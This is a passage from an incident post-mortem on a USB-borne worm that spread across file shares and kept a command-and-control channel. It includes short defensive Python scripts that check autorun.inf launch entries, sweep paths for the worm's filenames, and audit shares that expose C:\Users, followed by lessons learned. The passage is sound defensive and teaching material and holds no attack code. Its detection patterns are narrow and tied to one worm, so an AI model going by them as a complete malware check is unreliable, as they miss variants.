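        inf = os.path.join(drive_root, "autorun.inf")
        if not os.path.exists(inf):
            return
        parser = configparser.ConfigParser(strict=False, interpolation=None)
        try:
            parser.read(inf)
        except configparser.Error:
            print(f"{inf}: unparseable (obfuscation is itself a common sign of malice)")
            return
        if parser.has_section("autorun"):
            for option in ("open", "shellexecute"):
                if parser.has_option("autorun", option):
                    print(f"{inf}: '{option}' launches {parser.get('autorun', option)}")

    check_autorun("E:\\")   # point at the removable drive to be checked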

The VirusTotal result for owadzw.exe is similar to the results for gxcinr.exe and csrcs.exe, so they are all likely to be slight variations of one another:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274356524

We did not observe csrcs.exe trying to download any other executables, as was the case with Ian’s machine, nor did we observe ip.exe running on an infected machine.

Aside from spreading, the purpose of the malware is unknown. However, it is persistent (i.e., it will run every time you start your machine) and it does appear to have a command and control facility. It is entirely possible that at some later date it will ask for instructions and be told to carry out some other kind of activity (spamming, DoS, etc.), or it may download additional components (keyloggers, for example).

Where do we stand?

We understand the malware’s behaviour, and know how to look for indicators of it running both in terms of network activity and residual traces on the infected host. At present there are none, so we appear to be clean.
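For the host-side part, the residual traces boil down to a handful of filenames, so a sweep is as simple as the sketch below (the share roots listed are the ones identified earlier in this report; substitute whatever applies to the host being checked):

    import os

    SHARE_ROOTS = [r"C:\Users",
                   r"C:\Program Files\Some software v1.1",
                   r"E:\Testbeds\TestOne"]
    NAMES = ["gxcinr.exe", "owadzw.exe", "khw"]

    candidates = [os.path.expandvars(r"%SystemRoot%\System32\csrcs.exe")]
    candidates += [os.path.join(root, name) for root in SHARE_ROOTS for name in NAMES]

    for path in candidates:
        if os.path.exists(path):
            print("indicator present:", path)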

What went right?

  • An incident was triggered by virtue of an explicit indicator of malice (the $AV_VENDOR alerts from Annie’s and Linda’s machines).
  • Where functioning properly, $AV_VENDOR prevented the spread of the malware.
  • $URLFILTER blocked a malicious download.
  • We were able to preserve and analyse sufficient evidence in the total absence of Patient Zero (Ian’s machine) for us to understand how the malware spreads. This let us carry out a comprehensive search for any other, undetected, infections (like the one on $VICTIM_SERVER_3).
  • We were able to recover a sample of the malware and analyse it to the extent that we can say with a good degree of confidence that it was present on Ian’s USB stick, and was responsible for the whole incident (as opposed to merely being the payload for some other unknown malware that had been running on Ian’s machine for an unknown period of time).
  • We were able to sharpen our detection of the malware, now that we know how it behaves.

What went wrong?

  • The infection was not stopped at its point of entry (Ian’s machine), most likely because $AV_VENDOR wasn’t working properly.
  • The malware executed as a Domain Administrator, effectively removing any limit on the damage it could have caused.
  • The malware spread outside of the enterprise and infected other machines.
  • The malware infected an enterprise machine unprotected by $AV_VENDOR.
  • $VICTIM_SERVER_1 and $VICTIM_SERVER_2 did not report their infection to $AV_MANAGEMENT_SERVER. These detections were only discovered as part of the evidence preservation process.
  • $URLFILTER did not block the C&C channel due to the way it was configured.
  • The $IPS didn’t fire any “scanner” signatures.
  • No statistical alarms were raised by the $SIEM.

What can be changed or done better?

  • A review of the state of the $AV_VENDOR deployment should be carried out. We need to know what the coverage is like, how well the updates are working, and why certain machines don’t report to $AV_MANAGEMENT_SERVER.
  • Some form of USB device control should be implemented.
  • People with Administrative rights on the enterprise network should have two accounts, one “Admin” account and one “Normal” account. The Normal account should be used day-to-day, with the Admin account used only where necessary. This would put a cap on the capability of any malware that is able to run.
  • Unnecessary fileshares should be removed. It was determined experimentally that if you share anything within any user profile on a Vista or Win7 machine, the entire c:\users\ directory gets shared. This was the case on Annie’s and Linda’s machines (a quick audit sketch follows this list).
  • The presence of Skype doesn’t help when dealing with an incident like this – its constant chatter to random IP addresses and ports was enough to mask the malware’s command and control channel.
  • If a tighter outbound port filtering policy had been applied, the command and control channel would have been blocked, as would the worm’s attempts to propagate outside of the enterprise.
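On the fileshare point above, a very rough way to spot a machine exposing user-profile paths is sketched below (the parsing of ‘net share’ output is crude and assumes an English-language system):

    import subprocess

    # List local shares and flag any whose backing path sits under C:\Users,
    # which is what exposed Annie's and Linda's machines to the worm.
    output = subprocess.run(["net", "share"], capture_output=True, text=True).stdout
    for line in output.splitlines():
        if "c:\\users" in line.lower():
            print("share exposes a user-profile path:", line.strip())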

END OF REPORT

The production of this report would not have been possible without the routine collection of evidence from everything-you-can-lay-your-hands-on – servers, routers, switches, AV servers, URL filters and IPS devices all contributed to the report (notable things that did not contribute to the report are Ian’s machine and his USB stick, since they were wiped before they could play a part).

Without these event sources, all we’d have had were two reports of removed malware. Hardly cause for alarm, surely….


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk
